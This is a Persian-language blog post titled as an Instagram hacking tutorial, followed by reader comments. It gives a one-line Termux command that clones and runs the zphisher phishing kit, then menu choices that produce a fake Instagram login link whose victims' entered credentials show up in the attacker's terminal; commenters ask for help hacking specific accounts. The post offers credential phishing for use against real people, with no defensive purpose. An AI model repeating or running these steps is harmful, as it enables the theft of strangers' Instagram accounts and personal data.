Hacked by:Sina kocaen

مطالبی از sina kocaen

Hacked by:Sina kocaen

مطالبی از sina kocaen

هک اینستاگرام

پنجشنبه, ۲۸ فروردين ۱۳۹۹، ۰۱:۳۷ ق.ظ

با سلام خدمت شما دوستان عزیز سینا کوکائین هستم 

با اموزش هک اینستاگرام از طریق سایت همراهتون هستم

کد های زیر را در ترموکس اجرا کنید

apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh

بعد از این کد صفحه ای باز میشه و عدد کنار متن instagram را وارد کنید و اینتر را بزنید

 

بعد عدد2بزنید و اینتر بزنید

سپس عدد 3و اینتر بزنید

 

یک لینک سایت به شما میده کپی میکنید و وارد برنامه کروم میشید

و اون لینک رو وارد میکنید مشخصات میزنید و همون مشخصات کاملا دقیق در ترموکس شما نشان داده میشود

 

توجه بعد از کپی کردن لینک سایت ترموکس نباید بسته باشه

Sina kocaen

۹۹/۰۱/۲۸
Sina kocaen

نظرات  (۳)

سلام من زدم ولی برام کد نفرستاد که کپی کنم و برم تو گوگل 

ببخشید یه سوال داشتم و اگه امکان داره جوابمو بدین

اصلا با ترموکس میشه هک کرد؟

اگه امکان داره بهم بگید چطور ؟

برام جیمیل کنید به خدا یه عمر دعا گوت میشم

از بس با ترموکس کارکردم و نتونستم کاری کنم دیوونه شدم

اگه میتونید کمکم کنید.

 

سلام وقتی اینستاگرام را وارد میکنم خطا میده دلیلش چیه ؟؟؟

سلام ببخشید الان بستگی هاشو میگید مثلا اگر اینو بزنیم مال کی رو هک میکنه؟مثلا فلان اکانت این شماره

ارسال نظر

ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی